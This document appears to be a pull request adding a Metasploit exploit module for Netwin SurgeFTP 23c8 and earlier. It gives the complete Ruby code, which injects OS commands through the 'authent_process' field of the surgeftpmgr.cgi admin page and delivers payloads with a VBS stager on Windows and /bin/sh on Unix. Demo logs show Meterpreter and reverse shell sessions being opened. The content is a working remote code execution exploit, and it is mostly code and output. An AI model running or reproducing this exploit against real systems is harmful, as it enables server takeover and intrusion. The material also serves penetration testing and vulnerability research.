### PR TITLE
Add Netwin surgeftp exec module

### DIFF
--- a/modules/exploits/multi/http/netwin_surgeftp_exec.rb
+++ b/modules/exploits/multi/http/netwin_surgeftp_exec.rb
@@ -31,14 +31,10 @@ class Metasploit3 < Msf::Exploit::Remote
 				[
 					['EDB', '23522']
 				],
-			'Payload'        =>
-				{
-					'DisableNops' => true
-				},
 			'Targets'        =>
 				[
 					[ 'Windows', { 'Arch'=>ARCH_X86, 'Platform'=>'win'}  ],
-					[ 'Unix',    { 'Arch'=>ARCH_CMD, 'Platform'=>'unix'} ]
+					[ 'Unix',    { 'Arch'=>ARCH_CMD, 'Platform'=>'unix', 'Payload'=>{'BadChars' => "\x22"}} ]
 				],
 			'DisclosureDate' => 'Dec 06 2012'))
 
@@ -46,8 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			[
 				Opt::RPORT(7021),
 				OptString.new('USERNAME', [ true, 'The username with admin role to authenticate as', 'admin' ]),
-				OptString.new('PASSWORD', [ true, 'The password for the specified username', 'password' ]),
-				OptString.new('FOLDER',   [ true, 'The folder to write to for Windows target', 'C:\\Windows\\Temp\\'])
+				OptString.new('PASSWORD', [ true, 'The password for the specified username', 'password' ])
 			], self.class)
 	end
 
@@ -61,8 +56,6 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def execute_command(cmd, opts)
-		# Unfortunately we can't use env vars
-		cmd = cmd.gsub(/\%TEMP\%\\/, datastore['FOLDER'])
 		http_send_command("cmd.exe /q /c #{cmd}")
 	end
 

--- a/modules/exploits/multi/http/netwin_surgeftp_exec.rb
+++ b/modules/exploits/multi/http/netwin_surgeftp_exec.rb
@@ -49,7 +49,16 @@ class Metasploit3 < Msf::Exploit::Remote
 				OptString.new('PASSWORD', [ true, 'The password for the specified username', 'password' ]),
 				OptString.new('FOLDER',   [ true, 'The folder to write to for Windows target', 'C:\\Windows\\Temp\\'])
 			], self.class)
+	end
 
+	def check
+		res = send_request_raw({'uri'=>'/cgi/surgeftpmgr.cgi'})
+		print_line(Rex::Text.to_hex_dump(res.body))
+		if res and res.body =~ /surgeftp\x20\x0d\x0a\x20\x20Manager CGI/
+			return Exploit::CheckCode::Detected
+		else
+			return Exploit::CheckCode::Safe
+		end
 	end
 
 	def execute_command(cmd, opts)

--- a/modules/exploits/multi/http/netwin_surgeftp_exec.rb
+++ b/modules/exploits/multi/http/netwin_surgeftp_exec.rb
@@ -53,7 +53,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def check
 		res = send_request_raw({'uri'=>'/cgi/surgeftpmgr.cgi'})
-		print_line(Rex::Text.to_hex_dump(res.body))
 		if res and res.body =~ /surgeftp\x20\x0d\x0a\x20\x20Manager CGI/
 			return Exploit::CheckCode::Detected
 		else
@@ -63,7 +62,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def execute_command(cmd, opts)
 		# Unfortunately we can't use env vars
-		#cmd = cmd.gsub(/\%TEMP\%\\/, 'C:\\')
 		cmd = cmd.gsub(/\%TEMP\%\\/, datastore['FOLDER'])
 		http_send_command("cmd.exe /q /c #{cmd}")
 	end

--- a/modules/exploits/multi/http/netwin_surgeftp_exec.rb
+++ b/modules/exploits/multi/http/netwin_surgeftp_exec.rb
@@ -1,0 +1,126 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = GoodRanking
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::CmdStagerVBS
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Netwin SurgeFTP Remote Command Execution',
+			'Description'    => %q{
+					This module exploits a vulnerability found in Netwin SurgeFTP, version 23c8
+				or prior.  In order to execute commands via the FTP service, please note that
+				you must have a valid credential to the web-based administrative console.
+			},
+			'Author'	=> 
+				[
+					'Spencer McIntyre',  #Who found this vuln?
+					'sinn3r'
+				],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					['EDB', '23522']
+				],
+			'Payload'        =>
+				{
+					'DisableNops' => true
+				},
+			'Targets'        =>
+				[
+					[ 'Windows', { 'Arch'=>ARCH_X86, 'Platform'=>'win'}  ],
+					[ 'Unix',    { 'Arch'=>ARCH_CMD, 'Platform'=>'unix'} ]
+				],
+			'DisclosureDate' => 'Dec 06 2012'))
+			
+		register_options(
+			[
+				Opt::RPORT(7021),
+				OptString.new('USERNAME', [ true, 'The username with admin role to authenticate as', 'admin' ]),
+				OptString.new('PASSWORD', [ true, 'The password for the specified username', 'password' ]),
+				OptString.new('FOLDER',   [ true, 'The folder to write to for Windows target', 'C:\\Windows\\Temp\\'])
+			], self.class)
+
+	end
+
+	def execute_command(cmd, opts)
+		# Unfortunately we can't use env vars
+		#cmd = cmd.gsub(/\%TEMP\%\\/, 'C:\\')
+		cmd = cmd.gsub(/\%TEMP\%\\/, datastore['FOLDER'])
+		http_send_command("cmd.exe /q /c #{cmd}")
+	end
+
+	def http_send_command(command)
+		res = send_request_cgi(
+		{
+			'uri'     => '/cgi/surgeftpmgr.cgi',
+			'method'  => 'POST',
+			'basic_auth' => datastore['USERNAME'] + ":" + datastore['PASSWORD'],
+			'vars_post' =>
+				{
+					'global_smtp' => "",
+					'global_restart' => "",
+					'global_style' => "",
+					'global_bind' => "",
+					'global_passive_ip' => "",
+					'global_passive_match' => "",
+					'global_logon_mode' => "",
+					'global_log_host' => "",
+					'global_login_error' => "",
+					'global_adminip' => "",
+					'global_total_users' => "",
+					'global_con_perip' => "",
+					'global_ssl' => "",
+					'global_ssl_cipher_list' => "",
+					'global_implicit_port' => "",
+					'log_level' => "",
+					'log_home' => "",
+					'global_watcher_program_ul' => "",
+					'global_watcher_program_dl' => "",
+					'authent_process' => command,
+					'authent_cmdopts' => "",
+					'authent_number' => "",
+					'authent_domain' => "",
+					'global_strip_user_domain' => "",
+					'global_noclass' => "",
+					'global_anon_hammer_over_time' => "",
+					'global_anon_hammer_max' => "",
+					'global_anon_hammer_block_time' => "",
+					'global_port' => "",
+					'global_mgr_port' => "",
+					'global_mgr_ssl_port' => "",
+					'cmd_global_save.x' => "36",
+					'cmd_global_save.y' => "8",
+				}
+		})
+
+		if res and res.body =~ /401 Authorization failed/
+			fail_with(Exploit::Failure::NoAccess, "Unable to log in!")
+		elsif not (res and res.code == 200)
+			fail_with(Exploit::Failure::Unknown, 'Failed to execute command.')
+		end
+	end
+
+	def exploit
+		case target['Platform']
+		when 'win'
+			print_status("#{rhost}:#{rport} - Sending VBS stager...")
+			execute_cmdstager({:linemax=>500})
+
+		when 'unix'
+			print_status("#{rhost}:#{rport} - Sending payload...")
+			http_send_command(%Q|/bin/sh -c "#{payload.encoded}"|)
+		end
+
+		handler
+	end
+end

--- a/modules/exploits/multi/http/netwin_surgeftp_exec.rb
+++ b/modules/exploits/multi/http/netwin_surgeftp_exec.rb
@@ -21,7 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				or prior.  In order to execute commands via the FTP service, please note that
 				you must have a valid credential to the web-based administrative console.
 			},
-			'Author'	=> 
+			'Author'         =>
 				[
 					'Spencer McIntyre',  #Who found this vuln?
 					'sinn3r'
@@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					[ 'Unix',    { 'Arch'=>ARCH_CMD, 'Platform'=>'unix'} ]
 				],
 			'DisclosureDate' => 'Dec 06 2012'))
-			
+
 		register_options(
 			[
 				Opt::RPORT(7021),


### PR DESCRIPTION
This is based on Exploit-DB's PoC:
http://www.exploit-db.com/exploits/23522/

EDB hosts the vulnerable Windows version.  I also tested the Unix version from the official site, still vulnerable:
http://netwinsite.com/cgi-bin/keycgi.exe?cmd=download&product=surgeftp

This module exploits a vulnerability found in Netwin SurgeFTP, version 23c8 or prior.  In order to execute commands via the FTP service, please note that you must have a valid credential to the web-based administrative console.

Demo on Windows:

```
...
[*] Command Stager progress -  96.49% done (101796/105503 bytes)
[*] Command Stager progress -  96.96% done (102295/105503 bytes)
[*] Command Stager progress -  97.43% done (102794/105503 bytes)
[*] Command Stager progress -  97.86% done (103243/105503 bytes)
[*] Command Stager progress -  98.33% done (103738/105503 bytes)
[*] Command Stager progress -  98.75% done (104187/105503 bytes)
[*] Command Stager progress -  99.20% done (104663/105503 bytes)
[*] Command Stager progress -  99.66% done (105145/105503 bytes)
[*] Sending stage (752128 bytes) to 10.0.1.6
[*] Command Stager progress - 100.00% done (105503/105503 bytes)
[*] Meterpreter session 4 opened (10.0.1.3:4444 -> 10.0.1.6:1423) at 2012-12-21 16:15:37 -0600

meterpreter >
```

Demo on Ubuntu:

```
[*] 10.0.1.11:7021 - Sending payload...
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 1LGYvFmqfedCMRFH;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "1LGYvFmqfedCMRFH\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 5 opened (10.0.1.3:4444 -> 10.0.1.11:52865) at 2012-12-21 16:16:46 -0600
```
